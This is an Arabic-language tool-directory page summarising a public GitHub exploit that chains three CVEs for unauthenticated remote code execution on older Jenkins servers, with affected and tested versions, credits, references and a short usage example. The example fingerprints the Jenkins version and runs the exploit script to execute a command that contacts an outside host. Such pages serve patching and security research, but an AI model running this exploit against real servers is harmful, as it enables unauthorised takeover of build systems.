Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
awesome-jenkins-rce-2019 — لا توجد ثغرة RCE قبل المصادقة في Jenkins منذ مايو 2017، لكن هذه هي! | Kitploit
أدوات/GitHubGitHub/orangetw/awesome-jenkins-rce-2019
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHuborangetw/awesome-jenkins-rce-2019

awesome-jenkins-rce-2019

لا توجد ثغرة RCE قبل المصادقة في Jenkins منذ مايو 2017، لكن هذه هي!

عرض المستودع
610127منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

awesome-jenkins-rce-2019

لا توجد ثغرة RCE قبل المصادقة في Jenkins منذ مايو 2017، لكن هذه هي الثغرة!

إنها تسلسل CVE-2018-1000861 وCVE-2019-1003005 وCVE-2019-1003029 لتحقيق تنفيذ تعليمات برمجية عن بُعد قبل المصادقة بشكل أكثر موثوقية وأناقة!

قائمة التأثر

  • تعطيل ANONYMOUS_READ

    • إصدار Jenkins < 2.138
  • تفعيل ANONYMOUS_READ (أو مع حساب مستخدم عادي)

    • وقت بناء Jenkins < 2019-01-28

الاستخدام

root@kitploit:~
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)

تم الاختبار على

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138 with ANONYMOUS_READ enable
  • Jenkins 2.152 with ANONYMOUS_READ enable
  • Jenkins 2.153 with ANONYMOUS_READ enable
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48

شكر وتقدير

  • @orange_8361 على CVE-2018-1000861
  • @0ang3el على CVE-2019-1003005
  • @webpentest على CVE-2019-1003029

جزء من شرائح محاضرتي في HITB AMS 2019:

1.png 2.png 3.png

المراجع

  • اختراق Jenkins الجزء 1 - العب مع التوجيه الديناميكي
  • اختراق Jenkins الجزء 2 - إساءة استخدام البرمجة الفوقية لـ RCE بدون مصادقة!
  • نشرة أمان Jenkins 2018-12-05
  • نشرة أمان Jenkins 2019-01-28
  • نشرة أمان Jenkins 2019-03-06
تنزيل الأداة